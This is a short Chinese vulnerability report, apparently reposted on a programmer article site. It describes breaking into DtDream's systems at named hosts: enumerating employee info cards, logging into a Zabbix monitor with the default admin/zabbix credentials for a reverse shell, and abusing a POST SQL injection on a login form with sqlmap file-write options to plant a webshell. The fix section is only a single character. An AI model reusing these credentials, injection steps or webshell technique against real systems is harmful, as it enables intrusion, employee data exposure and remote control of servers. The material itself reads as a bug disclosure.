数梦工场科技漏洞一枚(员工信息遍历/SQL注入getshell/反弹内网)
程序员文章站
2022-06-23 11:49:01
数梦工场位于美丽的云栖小镇.西湖区.杭州。数梦工场基于阿里飞天平台为各行业做云计算和大数据的场景化开发和服务。
我们的愿景是用最卓越的数据技术, 去实现最美好的梦想。
我们钟爱有执行力、有...
数梦工场位于美丽的云栖小镇.西湖区.杭州。数梦工场基于阿里飞天平台为各行业做云计算和大数据的场景化开发和服务。
我们的愿景是用最卓越的数据技术, 去实现最美好的梦想。
我们钟爱有执行力、有想法、有故事、甚至想拯救世界的你,不管是什么,只要有梦想,何不来同我们玩耍,一起用数据技术做点有意义的事情。
数梦工场
1、
员工信息遍历
http://www.dtdream.com/pub/e_card/00001.html
ceo信息 然后只有00001~09999遍历即可
2、
zabbix
http://monitor.dtdream.com
guest 未禁用
admin/zabbix 默认口令
添加脚本 执行下:
可以直接反弹 创业不易 不深入先
3、
SQL注入 getshell
http://pms.dtdream.com/coop/login/loginProcess/ investor_pwd=1&investor_name=1
POST注入
web application technology: PHP 5.4.45, Nginx
back-end DBMS: MySQL >= 5.0.0
有http://pms.dtdream.com/test.php 有了路径
直接
--file-write "./t.php" --file-dest "/var/www/html/t.php"
写shell
ok
先这样.
rt
解决方案:
改
上一篇: SQL性能优化之利益Hive优化数据仓库
下一篇: DevSecOps的一些思考关乎企业安全